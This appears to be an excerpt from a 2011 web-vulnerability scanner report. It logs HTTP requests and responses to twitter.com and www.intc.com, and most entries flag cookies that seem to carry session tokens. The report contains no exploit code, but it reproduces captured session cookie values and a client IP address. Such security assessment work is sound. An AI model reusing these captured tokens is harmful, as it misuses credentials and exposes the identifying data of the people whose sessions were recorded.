HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 23:22:34 GMT Server: hi Status: 200 OK X-Transaction: Sat Feb 05 23:22:34 +0000 2011-15854-13086 ETag: "b0c81407bf609b9b1cf953048b1105ab" Last-Modified: Sat, 05 Feb 2011 23:22:34 GMT X-Runtime: 0.00598 Content-Type: text/html; charset=utf-8 Content-Length: 58433 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296948154509230; path=/; expires=Sat, 12-Feb-11 23:22:34 GMT; domain=.twitter.com Set-Cookie: guest_id=129694815451621917; path=/; expires=Mon, 07 Mar 2011 23:22:34 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJZQIvgtAToHaWQiJTMyMDRkZDM2M2Y2OTVm%250AMjM0ZWVmYjAyMjcyMGRlYWM0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--cda732cdfd73b9251d4ab751bf5e3c3ba07fa792; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
guest_id=129694815582299188; path=/; expires=Mon, 07 Mar 2011 23:22:35 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /intel HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 23:22:35 GMT Server: hi Status: 200 OK X-Transaction: Sat Feb 05 23:22:35 +0000 2011-36832-54399 ETag: "3f5b73f849632157648b0cfb3f55a625" Last-Modified: Sat, 05 Feb 2011 23:22:35 GMT X-Runtime: 0.00573 Content-Type: text/html; charset=utf-8 Content-Length: 57222 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296948155814524; path=/; expires=Sat, 12-Feb-11 23:22:35 GMT; domain=.twitter.com Set-Cookie: guest_id=129694815582299188; path=/; expires=Mon, 07 Mar 2011 23:22:35 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCK9VIvgtAToHaWQiJTZlNDMwNDM3NzI0Y2Zk%250AMzE2ZDVlMGRkYTQ2ZGMyNzdjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a5011ad7a2fc54a431253ef8fa174a4aab1fa4cd; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
guest_id=129694815680453038; path=/; expires=Mon, 07 Mar 2011 23:22:36 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /intelnews HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 23:22:36 GMT Server: hi Status: 200 OK X-Transaction: Sat Feb 05 23:22:36 +0000 2011-99178-30534 ETag: "5ef92426ebdf2d0090dae9af07327303" Last-Modified: Sat, 05 Feb 2011 23:22:36 GMT X-Runtime: 0.00428 Content-Type: text/html; charset=utf-8 Content-Length: 50405 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296948156798428; path=/; expires=Sat, 12-Feb-11 23:22:36 GMT; domain=.twitter.com Set-Cookie: guest_id=129694815680453038; path=/; expires=Mon, 07 Mar 2011 23:22:36 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIVZIvgtAToHaWQiJWQ5Yzk4ZmY4Yzc2ODMw%250ANDBmOWI3NmU3NTA5N2I5MmU1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e3633c355f5d65ff6cfe5bdaa2b0cfdaeeaa156d; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
guest_id=129694815873954823; path=/; expires=Mon, 07 Mar 2011 23:22:38 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /share HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 403 Forbidden Date: Sat, 05 Feb 2011 23:22:38 GMT Server: hi Status: 403 Forbidden X-Transaction: Sat Feb 05 23:22:38 +0000 2011-20811-53000 Last-Modified: Sat, 05 Feb 2011 23:22:38 GMT Content-Type: text/html; charset=utf-8 Content-Length: 4792 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296948158732884; path=/; expires=Sat, 12-Feb-11 23:22:38 GMT; domain=.twitter.com Set-Cookie: guest_id=129694815873954823; path=/; expires=Mon, 07 Mar 2011 23:22:38 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCBRhIvgtAToHaWQiJTYzNjY1ZmI2MzZkY2Iz%250AYjIyM2Y1ZDA2MTMwN2NiMTYwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--686e305c212123b2dc28c72a24dcf76ac929959b; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?iid=gg_about+home_intc HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A05%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:06 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:06 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:06 GMT;path=/ Content-Type: text/html; charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /alerts.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:15:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A06%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:06 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:06 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:06 GMT;path=/ Content-Type: text/html; charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /analystCenter.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:50 GMT;path=/ Content-Type: text/html; charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /annuals.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:16:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A16%3A36%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:36 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:36 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:16:36 GMT;path=/ Content-Type: text/html; charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /briefcase.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:15:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A09%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:10 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40579%2E7605208;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:10 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:10 GMT;path=/ Content-Type: text/html; charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /common/download/download.cfm?CompanyID=INTC&FileID=361738&FileKey=f79153d7-eceb-4b38-8a7e-e2917f999659&FileName=_0008_virtual_1.jpg HTTP/1.1 Host: www.intc.com Proxy-Connection: keep-alive Referer: http://www.intc.com/index.cfm?iid=ftr+invrel Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NOMOBILE=0; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C1D065BF6CBF3E92923967C8F41218506; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 05 Feb 2011 23:14:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A15%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:15 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:15 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:15 GMT;path=/ location: http://files.shareholder.com/downloads/INTC/1158415371x0x361738/f79153d7-eceb-4b38-8a7e-e2917f999659/_0008_virtual_1.jpg Content-Type: text/html; charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /common/download/download.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 05 Feb 2011 23:15:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: X_SESSION=1158416520%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A59%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A59%27%7D%7C5E03233E5E00EFF0D4D7E6B4BD7D2167;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:59 GMT;path=/ Set-Cookie: X_BRIEFCASE=UPDATED%7C40489%2E7610995;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:59 GMT;path=/ Set-Cookie: X_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:59 GMT;path=/ location: http://files.shareholder.com/downloads/x/1158416520x0x// Content-Type: text/html; charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /common/mobile/?CompanyID=INTC HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:16:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A16%3A02%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:02 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:02 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:16:02 GMT;path=/ Content-Type: text/html; charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /contactUs.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A52%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:52 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:52 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:52 GMT;path=/ Content-Type: text/html; charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /corpInfo.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:50 GMT;path=/ Content-Type: text/html; charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /education.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:51 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:51 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:51 GMT;path=/ Content-Type: text/html; charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /eventdetail.cfm?EventID=92109 HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A48%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:48 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:48 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:48 GMT;path=/ Content-Type: text/html; charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /events.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;